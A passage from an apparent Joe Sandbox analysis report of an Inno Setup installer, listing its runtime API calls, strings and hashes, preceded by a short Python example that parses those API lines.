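The record above is the sequence an analyst wants to pull out of a report like this: one LoadLibraryA of uxtheme.dll followed by a run of GetProcAddress calls, each resolving an export by name. The module-handle argument is logged as 00000000, so the only way to attribute each export to a library is call order. The following is an added example, not code from the report or from Joe Sandbox, that parses the "APIs" lines of a function record into structured entries and groups the dynamically resolved export names under the library loaded before them. The function names (parse_api_lines, dynamically_resolved_exports), the line regex and the order-based pairing are this example's own assumptions; the sample lines are copied from the uxtheme.dll record above.

```python
import re
from typing import Dict, List, Optional

# Matches one "APIs" line of a Joe Sandbox function record, e.g.
#   • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
#   • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
# (assumed layout, derived from the lines on this page)
API_LINE = re.compile(
    r"^(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<mod>\w+)\((?P<args>[^()]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# First five lines of the uxtheme.dll record above; the remaining
# GetProcAddress lines are omitted here to keep the sample short.
SAMPLE = """
• Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
• LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
• GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
• GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
• GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
"""


def parse_api_lines(text: str) -> List[dict]:
    """Turn the report's API lines into records; lines that do not match are skipped."""
    records = []
    for raw in text.splitlines():
        m = API_LINE.match(raw.strip())
        if not m:
            continue
        args = m.group("args")
        records.append({
            "function": m.group("func"),
            "module": m.group("mod"),
            "args": [a.strip() for a in args.split(",")] if args else [],
            "ref": m.group("ref"),
            "subcall_of": m.group("sub"),  # None when the call is made by the function itself
        })
    return records


LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}


def dynamically_resolved_exports(records: List[dict]) -> Dict[Optional[str], List[str]]:
    """Group GetProcAddress export names under the library loaded before them.

    The handle passed to GetProcAddress is logged as 00000000 (unknown at trace
    time), so pairing is by call order: the most recent LoadLibrary* call in the
    function's own sequence is taken as the source library. Calls attributed to
    a subcall are skipped because they belong to the callee's sequence.
    """
    resolved: Dict[Optional[str], List[str]] = {}
    current_lib: Optional[str] = None
    for rec in records:
        if rec["subcall_of"]:
            continue
        if rec["function"] in LOADERS and rec["args"]:
            current_lib = rec["args"][0]
        elif rec["function"] == "GetProcAddress" and len(rec["args"]) >= 2:
            resolved.setdefault(current_lib, []).append(rec["args"][1])
    return resolved


if __name__ == "__main__":
    for lib, names in dynamically_resolved_exports(parse_api_lines(SAMPLE)).items():
        print(f"{lib}: {', '.join(names)}")
```

Run over the full record above, the output is the list of uxtheme.dll exports the installer runtime resolves at start-up; a name that appears twice (GetThemeBackgroundContentRect does, at two different refs) is kept twice so the count still matches the report.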
                                                                                                      APIs
                                                                                                      • GetDC.USER32(00000000), ref: 0041CA40
                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 0041CA4C
                                                                                                      • CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
                                                                                                      • CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
                                                                                                      • SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
                                                                                                      • FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
                                                                                                      • SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
                                                                                                      • SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
                                                                                                      • PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 0041CB2B
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
                                                                                                      • SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
                                                                                                      • RealizePalette.GDI32(00000000), ref: 0041CB7D
                                                                                                      • SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
                                                                                                      • RealizePalette.GDI32(0041CE3C), ref: 0041CB95
                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
                                                                                                      • SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
                                                                                                      • BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0041CBEE
                                                                                                      • DeleteDC.GDI32(00000000), ref: 0041CC04
                                                                                                        • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 269503290-0
                                                                                                      • Opcode ID: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                                      • Instruction ID: 91afdf38925dfcc0a19aef53af63d8b93a06df8cfedaf367688fa0d34ebdb442
                                                                                                      • Opcode Fuzzy Hash: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                                      • Instruction Fuzzy Hash: 01610071A44648AFDF10EBE9DC86FDFB7B8EB48704F10446AB504E7281D67CA940CB68
                                                                                                      APIs
                                                                                                      • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004569E3), ref: 0045667E
                                                                                                      • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,004569E3), ref: 004566A4
                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0045685B
                                                                                                      Strings
                                                                                                      • {pf32}\, xrefs: 0045671E
                                                                                                      • IPersistFile::Save, xrefs: 00456962
                                                                                                      • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456892
                                                                                                      • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004567F1
                                                                                                      • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00456904
                                                                                                      • IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004568CA
                                                                                                      • CoCreateInstance, xrefs: 004566AF
                                                                                                      • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004567BD
                                                                                                      • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456840
                                                                                                      • %ProgramFiles(x86)%\, xrefs: 0045672E
                                                                                                      • IPropertyStore::Commit, xrefs: 004568E3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateInstance$FreeString
                                                                                                      • String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
                                                                                                      • API String ID: 308859552-2363233914
                                                                                                      • Opcode ID: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                                      • Instruction ID: 2d3acbfbfe5134b3b68b6dcde43dfe431d970b0eaffbfac770a5f5266a6492d0
                                                                                                      • Opcode Fuzzy Hash: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                                      • Instruction Fuzzy Hash: 39B13170A00104AFDB50DFA9C845B9E7BF8AF09706F5540AAF804E7362DB78DD48CB69
                                                                                                      APIs
                                                                                                      • ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453
                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466
                                                                                                      • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000), ref: 00498476
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497
                                                                                                      • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000), ref: 004984A7
                                                                                                        • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                                      • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                                      • API String ID: 2000705611-3672972446
                                                                                                      • Opcode ID: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                                      • Instruction ID: 1a66146e65e487955493167600903b91e60bc3637ed1504a34615a6495e02ea1
                                                                                                      • Opcode Fuzzy Hash: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                                      • Instruction Fuzzy Hash: 5191A434A042049FDF11EBA9DC52BAE7BE5EF4A304F5144BBF500AB692DE7C9C05CA19
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,0045A994,?,?,?,?,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 0045A846
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                                      • API String ID: 1452528299-3112430753
                                                                                                      • Opcode ID: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                                      • Instruction ID: 43962401d403c06de7b31dde6fd87328655f81364e16ca473e433d379c6e1912
                                                                                                      • Opcode Fuzzy Hash: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                                      • Instruction Fuzzy Hash: EC719070B002545BCB00EB6998417AE77A49F4931AF91896BFC01AB383DB7C9E1DC75E
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32 ref: 0045CBDA
                                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
                                                                                                        • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
                                                                                                      • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                                      • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                                      • API String ID: 59345061-4263478283
                                                                                                      • Opcode ID: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                                      • Instruction ID: 99773ef8a3d0261052733c4904a47669a242c0659fe16ead1f438c4abb71ff4e
                                                                                                      • Opcode Fuzzy Hash: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                                      • Instruction Fuzzy Hash: BD518471900308EFDB10DF99C881BEEBBB8EB48711F14806AF904E7241C678A945CFA9
                                                                                                      APIs
                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
                                                                                                      • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
                                                                                                      • CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
                                                                                                      • GetDC.USER32(00000000), ref: 0041B402
                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041B455
                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                                      • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                                      • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                                      • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                                      • String ID:
                                                                                                      • API String ID: 644427674-0
                                                                                                      • Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                                      • Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
                                                                                                      • Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                                      • Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472D00
                                                                                                      • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472E07
                                                                                                      • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472E1D
                                                                                                      • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472E42
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                                      • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                                      • API String ID: 971782779-3668018701
                                                                                                      • Opcode ID: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                                      • Instruction ID: 7edda302242157afef40b0e7c7e05039b068dedd9e36cd510e855ba872eb221a
                                                                                                      • Opcode Fuzzy Hash: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                                      • Instruction Fuzzy Hash: D0D14574A001489FDB11EFA9D981BDDBBF4AF08304F50816AF904B7392C778AE45CB69
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045AB6A,00000003,00000000,00000000,00454B44), ref: 0045498D
                                                                                                        • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                                      • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
                                                                                                      • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
                                                                                                      Strings
                                                                                                      • , xrefs: 004548FE
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
                                                                                                      • RegOpenKeyEx, xrefs: 00454910
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValue$FormatMessageOpen
                                                                                                      • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                      • API String ID: 2812809588-1577016196
                                                                                                      • Opcode ID: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                                      • Instruction ID: 3b35aed17da8244e85d272d2923899a44a2159637523a8fd9e70e85f8d21f96a
                                                                                                      • Opcode Fuzzy Hash: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                                      • Instruction Fuzzy Hash: 23914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
                                                                                                      APIs
                                                                                                        • Part of subcall function 00459364: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004594FF
                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 00459569
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
                                                                                                      Strings
                                                                                                      • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045951C
                                                                                                      • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
                                                                                                      • v4.0.30319, xrefs: 004594F1
                                                                                                      • v1.1.4322, xrefs: 004595C2
                                                                                                      • v2.0.50727, xrefs: 0045955B
                                                                                                      • .NET Framework version %s not found, xrefs: 00459609
                                                                                                      • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459583
                                                                                                      • .NET Framework not found, xrefs: 0045961D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close$Open
                                                                                                      • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                                      • API String ID: 2976201327-446240816
                                                                                                      • Opcode ID: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                                      • Instruction ID: e7879d346446e6db82ad1067b50e8ffdd52b59a139ce3e0e88c8f748029a0227
                                                                                                      • Opcode Fuzzy Hash: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                                      • Instruction Fuzzy Hash: EB51A331A04148EBCB01DFA8C8A1BEE77A5DB59305F54447BA801DB353EA3D9E1ECB19
                                                                                                      APIs
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00458A7B
                                                                                                      • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
                                                                                                      • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
                                                                                                      • GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458AFD
                                                                                                      • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
                                                                                                      Strings
                                                                                                      • Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
                                                                                                      • Helper process exited with failure code: 0x%x, xrefs: 00458AE3
                                                                                                      • Helper isn't responding; killing it., xrefs: 00458A87
                                                                                                      • Helper process exited., xrefs: 00458AC5
                                                                                                      • Helper process exited, but failed to get exit code., xrefs: 00458AEF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
